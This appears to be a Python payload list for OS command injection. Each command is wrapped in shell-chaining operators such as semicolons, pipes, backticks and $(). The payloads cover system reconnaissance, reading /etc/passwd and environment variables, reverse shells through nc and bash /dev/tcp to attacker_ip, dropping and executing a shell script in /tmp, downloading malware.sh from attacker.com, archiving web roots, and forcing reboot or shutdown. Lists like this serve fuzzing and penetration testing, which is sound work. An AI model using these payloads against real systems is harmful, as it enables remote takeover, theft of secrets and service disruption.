ospayloads = [
    # Basic command injections
    "; ls",
    "&& ls",
    "| ls",
    "|| ls",
    "`ls`",
    "$(ls)",
    "; whoami",
    "&& whoami",
    "| whoami",
    "|| whoami",
    "`whoami`",
    "$(whoami)",
    "; uname -a",
    "&& uname -a",
    "| uname -a",
    "|| uname -a",
    "`uname -a`",
    "$(uname -a)",
    "; id",
    "&& id",
    "| id",
    "|| id",
    "`id`",
    "$(id)",
    
    # File listing
    "; cat /etc/passwd",
    "&& cat /etc/passwd",
    "| cat /etc/passwd",
    "|| cat /etc/passwd",
    "`cat /etc/passwd`",
    "$(cat /etc/passwd)",
    "; ls -la /",
    "&& ls -la /",
    "| ls -la /",
    "|| ls -la /",
    "`ls -la /`",
    "$(ls -la /)",
    
    # Network and system information
    "; ifconfig",
    "&& ifconfig",
    "| ifconfig",
    "|| ifconfig",
    "`ifconfig`",
    "$(ifconfig)",
    "; ip addr show",
    "&& ip addr show",
    "| ip addr show",
    "|| ip addr show",
    "`ip addr show`",
    "$(ip addr show)",
    "; netstat -an",
    "&& netstat -an",
    "| netstat -an",
    "|| netstat -an",
    "`netstat -an`",
    "$(netstat -an)",
    "; arp -a",
    "&& arp -a",
    "| arp -a",
    "|| arp -a",
    "`arp -a`",
    "$(arp -a)",
    
    # Reverse shells
    "; nc -e /bin/bash attacker_ip 4444",
    "&& nc -e /bin/bash attacker_ip 4444",
    "| nc -e /bin/bash attacker_ip 4444",
    "|| nc -e /bin/bash attacker_ip 4444",
    "`nc -e /bin/bash attacker_ip 4444`",
    "$(nc -e /bin/bash attacker_ip 4444)",
    "; bash -i >& /dev/tcp/attacker_ip/4444 0>&1",
    "&& bash -i >& /dev/tcp/attacker_ip/4444 0>&1",
    "| bash -i >& /dev/tcp/attacker_ip/4444 0>&1",
    "|| bash -i >& /dev/tcp/attacker_ip/4444 0>&1",
    "`bash -i >& /dev/tcp/attacker_ip/4444 0>&1`",
    "$(bash -i >& /dev/tcp/attacker_ip/4444 0>&1)",
    
    # Write files
    "; echo 'malicious' > /tmp/testfile",
    "&& echo 'malicious' > /tmp/testfile",
    "| echo 'malicious' > /tmp/testfile",
    "|| echo 'malicious' > /tmp/testfile",
    "`echo 'malicious' > /tmp/testfile`",
    "$(echo 'malicious' > /tmp/testfile)",
    "; touch /tmp/malicious_file",
    "&& touch /tmp/malicious_file",
    "| touch /tmp/malicious_file",
    "|| touch /tmp/malicious_file",
    "`touch /tmp/malicious_file`",
    "$(touch /tmp/malicious_file)",
    
    # Create reverse shell scripts
    "; echo -e '#!/bin/bash\nnc -e /bin/bash attacker_ip 4444' > /tmp/shell.sh",
    "&& echo -e '#!/bin/bash\nnc -e /bin/bash attacker_ip 4444' > /tmp/shell.sh",
    "| echo -e '#!/bin/bash\nnc -e /bin/bash attacker_ip 4444' > /tmp/shell.sh",
    "|| echo -e '#!/bin/bash\nnc -e /bin/bash attacker_ip 4444' > /tmp/shell.sh",
    "`echo -e '#!/bin/bash\nnc -e /bin/bash attacker_ip 4444' > /tmp/shell.sh`",
    "$(echo -e '#!/bin/bash\nnc -e /bin/bash attacker_ip 4444' > /tmp/shell.sh)",
    "; chmod +x /tmp/shell.sh",
    "&& chmod +x /tmp/shell.sh",
    "| chmod +x /tmp/shell.sh",
    "|| chmod +x /tmp/shell.sh",
    "`chmod +x /tmp/shell.sh`",
    "$(chmod +x /tmp/shell.sh)",
    "; /tmp/shell.sh",
    "&& /tmp/shell.sh",
    "| /tmp/shell.sh",
    "|| /tmp/shell.sh",
    "`/tmp/shell.sh`",
    "$(/tmp/shell.sh)",
    
    # Process handling
    "; ps aux",
    "&& ps aux",
    "| ps aux",
    "|| ps aux",
    "`ps aux`",
    "$(ps aux)",
    "; top -b -n1",
    "&& top -b -n1",
    "| top -b -n1",
    "|| top -b -n1",
    "`top -b -n1`",
    "$(top -b -n1)",
    "; killall -9 bash",
    "&& killall -9 bash",
    "| killall -9 bash",
    "|| killall -9 bash",
    "`killall -9 bash`",
    "$(killall -9 bash)",
    
    # System users and groups
    "; getent passwd",
    "&& getent passwd",
    "| getent passwd",
    "|| getent passwd",
    "`getent passwd`",
    "$(getent passwd)",
    "; getent group",
    "&& getent group",
    "| getent group",
    "|| getent group",
    "`getent group`",
    "$(getent group)",
    "; cat /etc/group",
    "&& cat /etc/group",
    "| cat /etc/group",
    "|| cat /etc/group",
    "`cat /etc/group`",
    "$(cat /etc/group)",
    
    # Environmental variables
    "; env",
    "&& env",
    "| env",
    "|| env",
    "`env`",
    "$(env)",
    "; printenv",
    "&& printenv",
    "| printenv",
    "|| printenv",
    "`printenv`",
    "$(printenv)",
    
    # System reboot/shutdown
    "; reboot",
    "&& reboot",
    "| reboot",
    "|| reboot",
    "`reboot`",
    "$(reboot)",
    "; shutdown -h now",
    "&& shutdown -h now",
    "| shutdown -h now",
    "|| shutdown -h now",
    "`shutdown -h now`",
    "$(shutdown -h now)",
    
    # Fetch files
    "; wget http://attacker.com/malware.sh",
    "&& wget http://attacker.com/malware.sh",
    "| wget http://attacker.com/malware.sh",
    "|| wget http://attacker.com/malware.sh",
    "`wget http://attacker.com/malware.sh`",
    "$(wget http://attacker.com/malware.sh)",
    "; curl http://attacker.com/malware.sh",
    "&& curl http://attacker.com/malware.sh",
    "| curl http://attacker.com/malware.sh",
    "|| curl http://attacker.com/malware.sh",
    "`curl http://attacker.com/malware.sh`",
    "$(curl http://attacker.com/malware.sh)",
    
    # Archive handling
    "; tar -czvf /tmp/archive.tar.gz /var/www/html/",
    "&& tar -czvf /tmp/archive.tar.gz /var/www/html/",
    "| tar -czvf /tmp/archive.tar.gz /var/www/html/",
    "|| tar -czvf /tmp/archive.tar.gz /var/www/html/",
    "`tar -czvf /tmp/archive.tar.gz /var/www/html/`",
    "$(tar -czvf /tmp/archive.tar.gz /var/www/html/)",
    
    # Miscellaneous
    "; date",
    "&& date",
    "| date",
    "|| date",
    "`date`",
    "$(date)",
    "; echo 'Hello World'",
    "&& echo 'Hello World'",
    "| echo 'Hello World'",
    "|| echo 'Hello World'",
    "`echo 'Hello World'`",
    "$(echo 'Hello World')",
    "; df -h",
    "&& df -h",
    "| df -h",
    "|| df -h",
    "`df -h`",
    "$(df -h)",
]
